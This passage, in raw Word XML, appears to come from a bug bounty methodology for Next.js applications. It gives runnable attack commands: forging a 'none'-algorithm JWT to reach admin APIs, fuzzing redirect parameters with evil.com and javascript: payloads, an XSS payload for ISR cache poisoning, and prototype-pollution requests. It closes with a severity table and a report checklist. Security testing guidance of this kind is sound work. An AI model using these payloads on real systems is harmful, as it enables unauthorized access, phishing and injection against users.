        <w:spacing w:after="40" w:before="12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An attacker can craft a modified JWT with elevated privileges (e.g., role: "admin") and call API routes directly, bypassing the middleware entirely. The API trusts the decoded payload without checking the signature.</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1: Capture a valid JWT from the app (from cookie or Authorization header)</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2: Decode the JWT (without verifying signature)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echo "YOUR.JWT.TOKEN" | cut -d. -f2 | base64 -d 2&gt;/dev/null | python3 -m json.tool</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3: Modify the payload (e.g., elevate role)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python3 -c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import base64, json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payload = {"userId": "123", "role": "admin", "exp": 9999999999}</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encoded = base64.b64encode(json.dumps(payload).encode()).decode().rstrip("=")</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print(encoded)</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4: Forge a JWT with "none" algorithm (if app accepts it)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Header: {"alg":"none","typ":"JWT"}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HEADER=$(echo '{"alg":"none","typ":"JWT"}' | base64 | tr -d "=" | tr "+/" "-_")</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PAYLOAD=$(echo '{"userId":"1","role":"admin","exp":9999999999}' | base64 | tr -d "=" | tr "+/" "-_")</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FORGED_JWT="$HEADER.$PAYLOAD."</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5: Call API routes with the forged JWT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https://target.com/api/admin/users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"Authorization: Bearer $FORGED_JWT"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https://target.com/api/admin/users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"Cookie: token=$FORGED_JWT"</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:color="D1D5DB" w:sz="4" w:space="1"/>
        </w:pBdr>
        <w:spacing w:after="160" w:before="160"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="120" w:before="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="2C2C2A"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">6.2 Open Redirect via callbackUrl / next Parameter</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:before="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:shd w:fill="2471A3" w:val="clear"/>
        </w:rPr>
        <w:t xml:space="preserve">  SEVERITY: MEDIUM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Login and auth flows accept a redirect destination via query parameters (callbackUrl, redirect, next, returnTo). If not validated against an allowlist of trusted origins, these redirect users to arbitrary external URLs.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="40" w:before="12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Open redirects enable phishing: send a legitimate-looking URL (https://target.com/login?callbackUrl=https://phishing-site.com) to steal credentials. NextAuth.js historically had this issue (CVE-2022-29214).</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each variant of the redirect parameter</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for param in "callbackUrl" "redirect" "next" "returnTo" "goto" "url" "continue"; do</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for payload in "https://evil.com" "//evil.com" "/\\evil.com" "https://target.com.evil.com"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"javascript:alert(document.domain)" "data:text/html,&lt;script&gt;alert(1)&lt;/script&gt;"; do</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code=$(curl -sI "https://target.com/login?$param=$payload" -o /dev/null -w "%{http_code}")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location=$(curl -sI "https://target.com/login?$param=$payload" | grep -i "^location:")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echo "$param=$payload -&gt; $code | $location"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done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done | grep -v "target.com" | grep "302\|301\|303"</w:t>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7 — Security Headers &amp; Injection</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="120" w:before="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="2C2C2A"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">7.1 Missing or Weak Security Headers</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:before="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:shd w:fill="2471A3" w:val="clear"/>
        </w:rPr>
        <w:t xml:space="preserve">  SEVERITY: MEDIUM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Next.js does not set any security headers by default. They must be explicitly configured in next.config.js via the headers() function. Missing headers enable XSS, clickjacking, MIME sniffing, and downgrade attacks.</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Pull all headers from main page and API routes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https://target.com/api/any-route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Check for these specific headers (absence = finding):</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 | grep -iE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"content-security-policy|x-frame-options|strict-transport-security|\</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x-content-type-options|referrer-policy|permissions-policy|\</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cross-origin-opener-policy|cross-origin-resource-policy"</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Automated header check</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python3 -c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import urllib.request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headers = urllib.request.urlopen("https://target.com/").headers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required = ["Content-Security-Policy","X-Frame-Options","Strict-Transport-Security",</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"X-Content-Type-Options","Referrer-Policy","Permissions-Policy"]</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for h in required:</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status = "PRESENT" if any(h.lower() in k.lower() for k in headers) else "MISSING"</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print(f"{status}: {h}")</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w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="40" w:before="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1A56DB"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">What constitutes a finding</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="40" w:before="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:color w:val="2C2C2A"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">No Content-Security-Policy — enables XSS</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="40" w:before="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:color w:val="2C2C2A"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">No X-Frame-Options or CSP frame-ancestors — enables clickjacking</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="40" w:before="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:color w:val="2C2C2A"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">No Strict-Transport-Security — enables HTTPS downgrade</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="40" w:before="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:color w:val="2C2C2A"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">CSP with unsafe-inline or unsafe-eval — XSS protection useless</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="40" w:before="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:color w:val="2C2C2A"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">CSP with wildcard * sources</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:color="D1D5DB" w:sz="4" w:space="1"/>
        </w:pBdr>
        <w:spacing w:after="160" w:before="160"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="120" w:before="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="2C2C2A"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">7.2 ISR Cache Poisoning</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:before="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:shd w:fill="2471A3" w:val="clear"/>
        </w:rPr>
        <w:t xml:space="preserve">  SEVERITY: MEDIUM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Incremental Static Regeneration caches rendered pages for a configurable duration. If user-controlled input is reflected in a cacheable ISR page, an attacker can poison the cache to show malicious content to all subsequent visitors.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="40" w:before="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1A56DB"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Why it is an issue</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:color w:val="2C2C2A"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Cache poisoning can cause stored XSS, defacement, or injected content visible to all users of the app until the cache expires or is manually purged.</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1: Identify ISR pages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-sI https://target.com/some-page | grep -i "cache-control\|x-nextjs-cache"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ISR: cache-control: s-maxage=N, stale-while-revalidate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or: x-nextjs-cache: STALE / HIT / MISS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2: Find pages with user-controlled content in ISR</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Examples: /blog/[slug], /products/[id], /user/[username]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3: Test for injection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If the page renders based on your input (e.g., /search?q=...) and is cached:</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"https://target.com/search?q=&lt;img src=x onerror=alert(1)&gt;"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Then visit the URL in a browser — does the XSS fire for subsequent visitors?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Step 4: Check for on-demand revalidation endpoints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"https://target.com/api/revalidate?secret=TOKEN&amp;path=/poisoned-page"</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:color="D1D5DB" w:sz="4" w:space="1"/>
        </w:pBdr>
        <w:spacing w:after="160" w:before="160"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="120" w:before="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="2C2C2A"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">7.3 Prototype Pollution via Query String</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:before="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:shd w:fill="D68910" w:val="clear"/>
        </w:rPr>
        <w:t xml:space="preserve">  SEVERITY: HIGH  </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="40" w:before="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1A56DB"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">What it is</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:color w:val="2C2C2A"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">If the application uses a vulnerable query string parser (like older versions of qs) without proper sanitization, attackers can inject __proto__ or constructor.prototype keys to pollute JavaScript object prototypes server-side.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="40" w:before="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1A56DB"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">How to 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Test prototype pollution via query params on API routes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"https://target.com/api/search?__proto__[admin]=true"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"https://target.com/api/search?constructor[prototype][admin]=true"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"https://target.com/api/search?__proto__[polluted]=yes"</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POST body pollution</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-X POST https://target.com/api/update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-H "Content-Type: application/json"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-d '{"__proto__":{"admin":true},"data":"test"}'</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Verify pollution took effect (check subsequent request behavior)</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After polluting, call an endpoint that checks req.user.admin or similar</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curl -s "https://target.com/api/user/me" \</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-b "session=YOUR_COOKIE"</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr>
          <w:left w:val="single" w:color="1A56DB" w:sz="6" w:space="4"/>
        </w:pBdr>
        <w:shd w:fill="F3F4F6" w:val="clear"/>
        <w:spacing w:after="20" w:before="20"/>
        <w:ind w:left="400"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="1F2937"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"># If the response now shows admin: true, pollution worked</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:pBdr>
          <w:bottom w:val="single" w:color="1A56DB" w:sz="8" w:space="4"/>
        </w:pBdr>
        <w:spacing w:after="160" w:before="400"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="2C2C2A"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t xml:space="preserve">Phase 8 — Reporting &amp; Impact Articulation</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="120" w:before="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="2C2C2A"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">8.1 Severity Classification</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:color w:val="2C2C2A"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Use the following criteria when classifying findings for your bug bounty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2400"/>
        <w:gridCol w:w="3000"/>
      </w:tblGrid>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="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CVSS / Impact</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01</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Auth bypass (middleware CVE, JWT forgery)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2400"/>
            <w:tcBorders>
              <w:top w:val="single" w:color="D1D5DB" w:sz="1"/>
              <w:left w:val="single" w:color="D1D5DB" w:sz="1"/>
              <w:bottom w:val="single" w:color="D1D5DB" w:sz="1"/>
              <w:right w:val="single" w:color="D1D5DB" w:sz="1"/>
            </w:tcBorders>
            <w:shd w:fill="FCE8E6" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="80"/>
              <w:left w:type="dxa" w:w="120"/>
              <w:bottom w:type="dxa" w:w="80"/>
              <w:right w:type="dxa" w:w="120"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="2C2C2A"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">CRITICAL</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Full access without credentials</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02</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Secret key exposure (NEXT_PUBLIC_ / bundles)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2400"/>
            <w:tcBorders>
              <w:top w:val="single" w:color="D1D5DB" w:sz="1"/>
              <w:left w:val="single" w:color="D1D5DB" w:sz="1"/>
              <w:bottom w:val="single" w:color="D1D5DB" w:sz="1"/>
              <w:right w:val="single" w:color="D1D5DB" w:sz="1"/>
            </w:tcBorders>
            <w:shd w:fill="FCE8E6" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="80"/>
              <w:left w:type="dxa" w:w="120"/>
              <w:bottom w:type="dxa" w:w="80"/>
              <w:right w:type="dxa" w:w="120"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="2C2C2A"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">CRITICAL</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Account takeover, data breach</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03</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.env file accessible publicly</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2400"/>
            <w:tcBorders>
              <w:top w:val="single" w:color="D1D5DB" w:sz="1"/>
              <w:left w:val="single" w:color="D1D5DB" w:sz="1"/>
              <w:bottom w:val="single" w:color="D1D5DB" w:sz="1"/>
              <w:right w:val="single" w:color="D1D5DB" w:sz="1"/>
            </w:tcBorders>
            <w:shd w:fill="FCE8E6" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="80"/>
              <w:left w:type="dxa" w:w="120"/>
              <w:bottom w:type="dxa" w:w="80"/>
              <w:right w:type="dxa" w:w="120"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="2C2C2A"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">CRITICAL</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All secrets exposed</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04</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SSRF to metadata / internal services</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Credential theft, RCE pivot</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05</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API route unauthed access with data leak</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Data exfiltration / IDOR</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06</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Source map exposure in production</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Full code disclosure</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07</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CORS misconfiguration on auth'd API</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Cross-origin data theft</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08</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JWT only verified in middleware</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2400"/>
            <w:tcBorders>
              <w:top w:val="single" w:color="D1D5DB" w:sz="1"/>
              <w:left w:val="single" w:color="D1D5DB" w:sz="1"/>
              <w:bottom w:val="single" w:color="D1D5DB" w:sz="1"/>
              <w:right w:val="single" w:color="D1D5DB" w:sz="1"/>
            </w:tcBorders>
            <w:shd w:fill="FEF3CD" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="80"/>
              <w:left w:type="dxa" w:w="120"/>
              <w:bottom w:type="dxa" w:w="80"/>
              <w:right w:type="dxa" w:w="120"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="2C2C2A"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">HIGH</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Privilege escalation</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09</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Missing security headers (CSP / HSTS)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="24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Enables XSS / clickjacking</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="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10</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Open redirect</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2400"/>
            <w:tcBorders>
              <w:top w:val="single" w:color="D1D5DB" w:sz="1"/>
              <w:left w:val="single" w:color="D1D5DB" w:sz="1"/>
              <w:bottom w:val="single" w:color="D1D5DB" w:sz="1"/>
              <w:right w:val="single" w:color="D1D5DB" w:sz="1"/>
            </w:tcBorders>
            <w:shd w:fill="E3F2FD" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="80"/>
              <w:left w:type="dxa" w:w="120"/>
              <w:bottom w:type="dxa" w:w="80"/>
              <w:right w:type="dxa" w:w="120"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="2C2C2A"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">MEDIUM</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Phishing vector</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="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11</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__NEXT_DATA__ PII exposure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2C2C2A"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">MEDIUM/HIGH</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2C2C2A"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Depends on data sensitivity</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:color="D1D5DB" w:sz="4" w:space="1"/>
        </w:pBdr>
        <w:spacing w:after="160" w:before="160"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="120" w:before="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="2C2C2A"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">8.2 Report Template Checklist</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:color w:val="2C2C2A"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Every bug bounty report should include:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="40" w:before="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:color w:val="2C2C2A"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Vulnerability class and CVE reference (if applicable)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="40" w:before="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:color w:val="2C2C2A"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Affected URL, parameter, or header</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="40" w:before="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:color w:val="2C2C2A"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Step-by-step reproduction (exact curl commands or Burp repeater export)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="40" w:before="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:color w:val="2C2C2A"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Evidence: response screenshots, HTTP response showing the impact</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="40" w:before="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:color w:val="2C2C2A"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Impact statement: what an attacker can do with this, at scale</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="40" w:before="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:color w:val="2C2C2A"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Remediation: specific fix (config change, code change, version upgrade)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="40" w:before="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:color w:val="2C2C2A"/>
          <w:sz w:val="22"/>
